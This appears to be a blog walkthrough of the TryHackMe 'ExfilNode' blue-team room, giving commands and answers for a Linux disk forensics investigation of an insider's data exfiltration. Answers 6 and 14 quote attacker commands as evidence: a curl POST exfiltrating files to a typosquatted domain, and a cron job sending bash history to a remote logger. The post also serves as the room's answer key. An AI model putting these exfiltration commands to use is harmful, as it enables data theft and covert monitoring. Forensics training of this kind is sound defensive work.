---
layout: post
title: TryHackMe/Medium/ExfilNode
abbrlink: 27161c4abb8b4244886ab8d220b52b48
tags:
  - log analysis
  - linux forensics
  - blue team
categories:
  - Labs
  - TryHackMe
  - 2. Medium
  - ExfilNode
date: 1744401874021
updated: 1744406276546
---

<https://tryhackme.com/room/exfilnode>

# The End

## Room Prerequisites

- [Linux Forensics](https://tryhackme.com/room/linuxforensics)
- [Linux Incident Surface](https://tryhackme.com/room/linuxincidentsurface)
- [Linux Logs Investigations](https://tryhackme.com/room/linuxlogsinvestigations)
- [EXT Analysis](https://tryhackme.com/room/extanalysis)

**Note**: Before we continue to dive into the scenario, it is important to note that this challenge is the continuation of the [DiskFiltration room](https://tryhackme.com/room/diskfiltration), where Liam's company-provided machine was being investigated in a data exfiltration case. While it is recommended to go through that room first to get a better understanding of the story's context, it's not mandatory. You can also solve this room independently and test your Linux investigation skills.

## Scenario

The analysis of Liam's company-provided Windows workstation in the DiskFiltration room revealed major evidence of his involvement in the TECH THM's data exfiltration. However, he could argue that he was framed as he did not own the workstation. So, to uncover the whole truth and gather all the possible undeniable evidence, the investigators turned their attention to Liam's personal workstation (Linux machine), which was suspected to have played a key role in handling the exfiltrated data.

As this was Liam's personal workstation, he had full control over covering his tracks more effectively. But was he careful enough? It seems like the investigators not only revealed more about the external entity Liam worked with but also exposed a betrayal: Liam was double-crossed.

## Starting the Machine

Let’s start the virtual machine by pressing the `Start Machine` button below. The machine will start in split view.

In case the VM is not visible, use the blue `Show Split View` button at the top of the page.

Liam's personal workstation's disk is mounted at `/mnt/liam_disk`, and the disk image is available at `/home/ubuntu`. You can run commands on the mounted disk.

**Note**: If you get the error `grep: /mnt/liam_disk/var/log/auth.log: binary file matches` with any log file, use `grep -a` which will treat the file as text. An example is given below:

`grep -i -a "string-pattern" /mnt/liam_disk/var/log/auth.log`

Additionally, you can utilize the Autopsy tool to assist with the analysis. However, Autopsy is optional. All the questions in this room can be answered by running commands on the mounted disk.

To use Autopsy, open a terminal and navigate to `/home/ubuntu/autopsy/autopsy-4.21.0/bin` and execute the command .`/autopsy --nosplash` to execute it. The GUI of the tool will open. Now, select `Open Recent Case` from here and open the recent case named `Liam_Personal_Workstation` in which we have already imported the disk image.

***

## Q & A

1. When did Liam last logged into the system? (Format: YYYY-MM-DD HH:MM:SS)
   *2025-02-28 10:59:07*
   **Hint**: Focus on the graphical logins only.

   > Run the `grep` command on the `auth.log` and search for the string `logind` then look for the last login by the user `gdm` which is the Gnome Desktop Manager and the following login by the user `liam` is the last time Liam logged in via graphical login:
   > `grep -i -a "logind" /mnt/liam_disk/var/log/auth.log 
   > `

2. What was the timezone of Liam’s device?
   *America/Toronto*

> `ls -l /mnt/liam_disk/etc/localtime`

3. What is the serial number of the USB that was inserted by Liam?
   *2651931097993496666*

   > Run the command `cat /mnt/liam_disk/var/log/syslog | grep SerialNumber` and look for the `SerialNumber` field for the latest log entry

4. When was the USB connected to the system? (Format: YYYY-MM-DD HH:MM:SS)
   *2025-02-28 10:59:25*

   > Timestamp from the previous answer

5. What command was executed when Liam ran 'transferfiles'?
   *`cp -r \"/media/liam/46E8E28DE8E27A97/Critical Data TECH THM\" /home/liam/Documents/Data`*

   > Last line of Liam's `.bashrc` file contains the alias for `transferfiles` and the command it executes: `cat /mnt/liam_disk/home/liam/.bashrc`

6. What command did Liam execute to transfer the exfiltrated files to an external server?
   *`curl -X POST -d @/home/liam/Documents/Data http://tehc-thm.thm/upload`*

   > There is a `curl` command Liam runs which is using the `POST` method to upload data to the URL `tehc-thm.thm/upload` which is a typo of the company's name to avoid detection in the `.bash_history` log: `cat /mnt/liam_disk/home/liam/.bash_history`

7. What is the IP address of the domain to which Liam transferred the files to?
   *5.45.102.93*

   > Inside the `/etc/hosts` file the misspelled URL is assigned to the attacker's server: `cat /mnt/liam_disk/etc/hosts`

8. Which directory was the user in when they created the file 'mth'?
   *`/home/liam`*

   > Search for the `mth` file: `find /mnt/liam_disk/ -type f -name 'mth' 2>/dev/null`

9. Remember Henry, the external entity helping Liam during the exfiltration? What was the amount in USD that Henry had to give Liam for this exfiltration task?
   *10000*

   > Read the `mth` file: `cat /mnt/liam_disk/home/liam/mth`

10. When was the USB disconnected by Liam? (Format: YYYY-MM-DD HH:MM:SS)
    *2025-02-28 11:44:00*

    > `cat /mnt/liam_disk/var/log/syslog | grep 'USB disconnect'`

11. There is a .hidden/ folder that Liam listed the contents of in his commands. What is the full path of this directory?
    */home/liam/Public*

    > There is another `.hidden` directory and we can find it by running: `find /mnt/liam_disk/ -name '.hidden' 2>/dev/null`

12. Which files are likely timstomped in this .hidden/ directory (answer in alphabetical order, ascending, separated by a comma. e.g example1.txt,example2.txt)
    *file3.txt,file7.txt*

    > Run `ls -lah` on the `.hidden/` directory and look for unusual timestamps: `ls -lah /mnt/liam_disk/home/liam/Public/.hidden/`

13. Liam thought the work was done, but the external entity had other plans. Which IP address was connected via SSH to Liam's machine a few hours after the exfiltration?
    *94.102.51.15*

    > Search the `auth.log` for SSH connections: `cat /mnt/liam_disk/var/log/auth.log | grep -a 'ssh'`

14. Which cronjob did the external entity set up inside Liam’s machine?
    *`*/30 * * * * curl -s -X POST -d "$(whoami):$(tail -n 5 ~/.bash_history)" http://192.168.1.23/logger.php`*

    > Last line of the `/var/spool/cron/crontabs/liam` file. You will need to use `sudo` to read the contents: `sudo cat /mnt/liam_disk/var/spool/cron/crontabs/liam`
